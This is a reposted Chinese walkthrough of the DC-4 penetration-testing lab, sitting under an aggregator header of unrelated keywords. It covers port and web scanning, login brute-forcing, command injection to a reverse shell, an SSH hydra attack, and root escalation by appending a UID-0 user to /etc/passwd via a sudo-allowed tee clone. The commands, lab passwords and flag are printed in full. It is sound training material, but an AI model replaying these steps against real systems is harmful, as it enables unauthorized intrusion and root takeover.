您的位置:首页 > 健康 > 美食 > 百度推广技巧方法_网门网站下载地址_我想做网络推广找谁_手机如何建立网站

百度推广技巧方法_网门网站下载地址_我想做网络推广找谁_手机如何建立网站

2024/12/24 20:09:26 来源:https://blog.csdn.net/N61320/article/details/144459463  浏览:    关键词:百度推广技巧方法_网门网站下载地址_我想做网络推广找谁_手机如何建立网站
百度推广技巧方法_网门网站下载地址_我想做网络推广找谁_手机如何建立网站

主要知识点

  • 密码爆破
  • 潜在的包含密码的文件搜索
  • 在/etc/passwd 插入新用户提权

具体步骤

首先执行nmap 扫描,比较直接,80和22端口,22端口虽然有vulnerability,但是对咱们目前的情况来讲没有太大的帮助,主要关注一下80端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:37 UTC
Nmap scan report for 192.168.52.195
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10

对80端口进行nikto扫描和路径爆破,得到如下内容

C:\home\kali\Documents\OFFSEC\play\DC-4> cat nikto.txt 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.52.195
+ Target Hostname:    192.168.52.195
+ Target Port:        80
+ Start Time:         2024-12-13 09:38:25 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2024-12-13 09:38:38 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.172.195
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/command.php          (Status: 302) [Size: 704] [--> index.php]
/css                  (Status: 301) [Size: 170] [--> http://192.168.172.195/css/]
/images               (Status: 301) [Size: 170] [--> http://192.168.172.195/images/]
/index.php            (Status: 200) [Size: 506]
/login.php            (Status: 302) [Size: 206] [--> index.php]
/logout.php           (Status: 302) [Size: 163] [--> index.php]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
===============================================================

看来80端口开放了一个PHP写的应用,并且有command.php,index.php,login.php等主要文件,且login.php为登录页面

打开burpsuite ,尝试进行密码爆破,得到admin / happy 作为用户名和密码可以登录成功

登录成功后跳转到 command.php页面

查看请求,发现其实是发送了一个linux 命令作为参数,于是我们把该条请求记录发送到Repeater中进行修改,创建reverse shell

利用reverse shell我们可以查看到 old-passwords.bak,将其下载到本地后用来当做wordlist进行爆破

C:\home\kali\Documents\OFFSEC\play\DC-4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.206] from (UNKNOWN) [192.168.172.195] 48660
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/usr/share/nginx/html
cd /home/jim
ls -l
total 16
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw-r--r-- 1 root root   33 Dec 13 21:42 local.txt
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwxrwxrwx 1 jim  jim   190 Dec 13 22:07 test.sh
cd backups
ls
old-passwords.bak

得到密码jibril04

C:\home\kali\Documents\OFFSEC\play\DC-4> hydra -l jim -P password_list.txt ssh://192.168.172.195       
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-13 20:09:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.172.195:22/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 41 to do in 00:01h, 13 active
[22][ssh] host: 192.168.172.195   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found

用得到的密码可以以jim用户ssh登录到服务器,并且提示我有邮件

C:\home\kali\Documents\OFFSEC\play\DC-4> ssh jim@192.168.172.195             
The authenticity of host '192.168.172.195 (192.168.172.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.172.195' (ED25519) to the list of known hosts.
jim@192.168.172.195's password: 
......
......
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ sudo -l

查看了一下 mbox文件,没有太多收获,不过我们可以用来当做线索搜索其他邮件文件,于是我们上传linpeas.sh并运行,发现了线索

╔══════════╣ Mails (limit 50)9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/mail/jim7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/mail/www-data9813      4 -rw-rw----   1 jim      mail         2425 Dec 13 22:13 /var/spool/mail/jim7653      4 -rw-rw----   1 www-data mail         3516 Dec 13 22:04 /var/spool/mail/www-data

查看,得到了charles的密码

jim@dc-4:/var/mail$ cat jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)(envelope-from <charles@dc-4>)id 1hCjIX-0000kO-Qtfor jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: OHi Jim,I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.Password is:  ^xHhA&hvim0ySee ya,
Charles

于是我们利用这个密码来变成charles身份,并且发现charles可以sudo执行/usr/bin/teehee,

charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser charles may run the following commands on dc-4:(root) NOPASSWD: /usr/bin/teehee

经过观察和试验,这个teehee运行后会接受terminal的输入来写入到文件中,于是我们可以利用这一点来在/etc/passwd中追加一条记录

charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.-a, --append              append to the given FILEs, do not overwrite-i, --ignore-interrupts   ignore interrupt signals-p                        diagnose errors writing to non pipes--output-error[=MODE]   set behavior on write error.  See MODE below--help     display this help and exit--version  output version information and exit

首先创建一个密码,在追加如下内容到/etc/passwd文件并转换成tim的身份达成提权目的

charles@dc-4:~$ openssl passwd 1234
HQpXGqbwWyrdo
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
charles@dc-4:~$ su tim
Password: 
root@dc-4:/home/charles#  cat /root/proof.txt
eb471b16059fc83e6f3cf3900b73be38

个人评价

总体来看,难度并不大但是步骤比较繁多,有些绕,尤其是登录密码爆破,考虑到网络以及社区版本的burpsuite的性能限制,只能尝试较小的wordlist,如果使用rockyou的话,到明天早晨也爆破不完,如果是考试的话,感觉尽量避免密码爆破,特别是使用大字典的情况。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com